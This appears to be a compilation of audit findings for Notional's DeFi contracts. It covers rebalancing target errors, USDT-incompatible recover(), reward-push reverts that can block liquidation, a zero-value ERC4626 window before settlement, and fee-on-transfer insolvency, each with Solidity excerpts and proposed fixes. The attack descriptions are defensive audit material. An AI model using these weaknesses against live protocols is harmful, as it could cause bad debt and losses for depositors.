```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n
Due to the incorrect `targetAmount`, a `currencyId` that should be rebalanced may not have its `rebalance` executed, increasing the risk to the protocol.
```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n
recover() using the standard transfer may not be able to retrieve some tokens
medium
`SecondaryRewarder.recover()` uses the standard `IERC20.transfer()`. If the `token` is one like `USDT` that does not return a `bool`, the call will always `revert` and the tokens cannot be transferred out.\\n`SecondaryRewarder.recover()` is used to allow the Notional owner to recover any tokens sent to the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\\n```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n\\nBecause the standard `IERC20.transfer()` is used to execute the transfer, a `token` similar to `USDT` that has no return value will cause the transfer to always fail.
```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n// Remove the line below\\n IERC20(token).transfer(msg.sender, amount);\\n// Add the line below\\n GenericToken.safeTransferOut(token,msg.sender,amount);\\n }\\n }\\n```\\n
If `REWARD_TOKEN` is a token like `USDT`, it will not be possible to transfer it out.
```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n
Malicious users could block liquidation or perform DOS
medium
The current implementation uses a "push" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit. An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\n
The current implementation uses a "push" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.
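A sketch of the pull-based shape, reusing names from the quoted `SecondaryRewarder` code; `claimableRewards` and `withdrawRewards` are hypothetical additions, not existing functions:\\n```\\n// Sketch only: accrue rewards into storage during balance updates; transfer only on an explicit pull.\\nmapping(address => uint256) public claimableRewards;\\n\\nfunction _accrueRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private {\\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken);\\n rewardDebtPerAccount[account] = nTokenBalanceAfter\\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128();\\n if (0 < rewardToClaim) claimableRewards[account] += rewardToClaim;\\n}\\n\\nfunction withdrawRewards() external {\\n uint256 amount = claimableRewards[msg.sender];\\n claimableRewards[msg.sender] = 0;\\n GenericToken.safeTransferOut(REWARD_TOKEN, msg.sender, amount);\\n}\\n```\\nWith this shape, a reverting or blacklisting reward token only affects the claimer's own `withdrawRewards()` call, not deposits, withdrawals, or liquidations.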
Many of the core functionalities of the protocol will be affected by the revert. Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.
```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n
Unexpected behavior when calling certain ERC4626 functions
medium
Unexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\n
Document the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.
The `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.
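For illustration, a typical ERC4626-style conversion (a sketch, not necessarily the wrapper's exact code) shows why `convertToShares` reverts while `totalAssets()` is temporarily zero:\\n```\\n// Illustrative ERC4626-style conversion.\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n    uint256 supply = totalSupply();\\n    // After maturity but before settlement, totalAssets() returns 0 while supply > 0,\\n    // so this division reverts with a division-by-zero panic.\\n    return supply == 0 ? assets : (assets * supply) / totalAssets();\\n}\\n```\\n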
```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n
getOracleData() maxExternalDeposit not accurate
medium
in `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.
Subtract the treasury-accrued amount, `uint256(reserve.accruedToTreasury).rayMul(reserveCache.nextLiquidityIndex)`, from the remaining supply-cap headroom when computing `maxExternalDeposit`, mirroring Aave's own supply-cap check.
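A sketch of the adjusted computation; `accruedToTreasuryInUnderlying` is a hypothetical value that would need to be read from Aave (the reserve's `accruedToTreasury`, scaled up by the current liquidity index) via whichever accessor the data provider exposes:\\n```\\n// Sketch only: include the treasury-accrued amount in the "used" supply so that\\n// maxExternalDeposit mirrors Aave's SUPPLY_CAP_EXCEEDED check.\\nuint256 usedSupply = aTokenSupply + accruedToTreasuryInUnderlying; // hypothetical input\\n\\nif (supplyCap == 0) {\\n    oracleData.maxExternalDeposit = type(uint256).max;\\n} else if (supplyCap <= usedSupply) {\\n    oracleData.maxExternalDeposit = 0;\\n} else {\\n    oracleData.maxExternalDeposit = supplyCap - usedSupply;\\n}\\n```\\n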
An overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.
```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n
getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdraw
medium
In `getTargetExternalLendingAmount()`, when `targetUtilization == 0` the function immediately returns `targetAmount = 0`. It does not check whether there is enough `externalUnderlyingAvailableForWithdraw` to actually redeem down to that target, which may cause `_rebalanceCurrency()` to revert due to an insufficient balance for the `withdraw`.\\nWhen `setRebalancingTargets()` is used to set all targets to zero in order to immediately exit the external market, it calls `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n    function getTargetExternalLendingAmount(\\n        Token memory underlyingToken,\\n        PrimeCashFactors memory factors,\\n        RebalancingTargetData memory rebalancingTargetData,\\n        OracleData memory oracleData,\\n        PrimeRate memory pr\\n    ) internal pure returns (uint256 targetAmount) {\\n        // Short circuit a zero target\\n        if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n        if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n            uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n            if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n                // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n                targetAmount = targetAmount.add(\\n                    // unchecked - is safe here, overflow is not possible due to above if conditional\\n                    forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n                );\\n            }\\n        }\\n```\\n\\nWhen `targetUtilization == 0`, it returns `targetAmount == 0` and skips the later check of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Redeeming more than `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\\nFor example: `currentExternalUnderlyingLend = 100`, `externalUnderlyingAvailableForWithdraw = 99`. If `targetUtilization` is changed to `0`, then `targetAmount` should be `1`, not `0`; `0` will cause a revert because the available balance for withdrawal is insufficient.\\nInstead, the function should still withdraw as much of the deposit as is currently available, wait for liquidity to be replenished, and then withdraw the remainder until the external deposit is fully cleared.
Remove `targetUtilization == 0` directly returning 0.\\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n// Remove the line below\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n```\\n
A `targetAmount` that is too small may cause the AAVE withdrawal to fail, which in turn causes `setRebalancingTargets()` to revert.
```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n
getTargetExternalLendingAmount() targetAmount may far less than the correct value
medium
`ExternalLending.getTargetExternalLendingAmount()` caps `targetAmount` at `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` is computed against a supply that already includes the protocol's own deposit, `currentExternalUnderlyingLend`. This may result in the returned amount being far less than the correct one.\\nIn `getTargetExternalLendingAmount()`, `targetAmount` is capped at `oracleData.maxExternalDeposit`:\\n```\\n    function getTargetExternalLendingAmount(\\n        Token memory underlyingToken,\\n        PrimeCashFactors memory factors,\\n        RebalancingTargetData memory rebalancingTargetData,\\n        OracleData memory oracleData,\\n        PrimeRate memory pr\\n    ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n        targetAmount = SafeUint256.min(\\n            // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n            // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n            // is floored at zero.\\n            uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n            // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n            // maxExternalDeposit is limit due to the supply cap on external pools\\n            SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n        );\\n```\\n\\nThat is: `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`.\\nThe problem is that `oracleData.maxExternalDeposit` does not exclude the protocol's existing deposit, `currentExternalUnderlyingLend`.\\nFor example: `currentExternalUnderlyingLend = 100`, `targetExternalUnderlyingLend = 100`, `maxExternalUnderlyingLend = 10000`, `oracleData.maxExternalDeposit = 0` (the AAVE supply that fills the cap already includes the current deposit `currentExternalUnderlyingLend`).\\nWith the current calculation, `targetAmount = 0`, which means `100` would need to be withdrawn (`currentExternalUnderlyingLend - targetAmount`).\\nIn fact, the `maxExternalDeposit` cap should only apply when the result calls for increasing the deposit (`targetAmount > currentExternalUnderlyingLend`).\\nThe correct outcome in this example is to neither deposit nor withdraw, i.e. `targetAmount = currentExternalUnderlyingLend = 100`.
Only when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n
A `targetAmount` that is too small will cause deposits that should not be withdrawn to be redeemed from the external market, harming the protocol.
```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n
`wfCashERC4626` mints more shares than can be redeemed when the underlying asset is a fee-on-transfer token
medium
The `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.
Consider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC4626._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.
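A sketch of the second point; `hasTransferFee` and `transferFeeBps` are assumed configuration values rather than existing fields of the wrapper, and the `_previewDeposit` wiring is illustrative:\\n```\\nbool internal hasTransferFee;        // assumed flag (recommendation point 1)\\nuint256 internal transferFeeBps;     // assumed fee rate in basis points\\nuint256 internal constant FEE_BASIS = 10_000;\\n\\n/// @dev Amount that actually arrives after the token deducts its transfer fee.\\nfunction _netOfTransferFee(uint256 assets) internal view returns (uint256) {\\n    if (!hasTransferFee) return assets;\\n    return (assets * (FEE_BASIS - transferFeeBps)) / FEE_BASIS;\\n}\\n\\n/// @dev Quote shares against the net amount the wrapper will actually receive.\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n    return _previewDeposit(_netOfTransferFee(assets));\\n}\\n```\\n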
Although the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.
```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n
`ExternalLending` redemptions from AaveV3 always revert when the underlying is a fee-on-transfer token
medium
When the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.
When computing `withdrawAmount` / `data.expectedUnderlying`, the transfer fee should be accounted for. The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n    withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\n
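The same adjustment in Solidity form, assuming the fee is known in basis points (`transferFeeBps` is an illustrative parameter):\\n```\\nuint256 internal constant BPS = 10_000;\\n\\n/// @dev Request enough from Aave so that, after the token deducts its fee,\\n///      at least `withdrawAmount` actually arrives at the Notional proxy.\\n///      Rounding up (or relaxing the strict >= check) may be needed to cover\\n///      integer truncation.\\nfunction _grossUpForTransferFee(uint256 withdrawAmount, uint256 transferFeeBps) internal pure returns (uint256) {\\n    if (transferFeeBps == 0) return withdrawAmount;\\n    return (withdrawAmount * BPS) / (BPS - transferFeeBps);\\n}\\n```\\n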
```\\n    uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n    ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never be redeemed. This can lead to insolvency of the protocol.
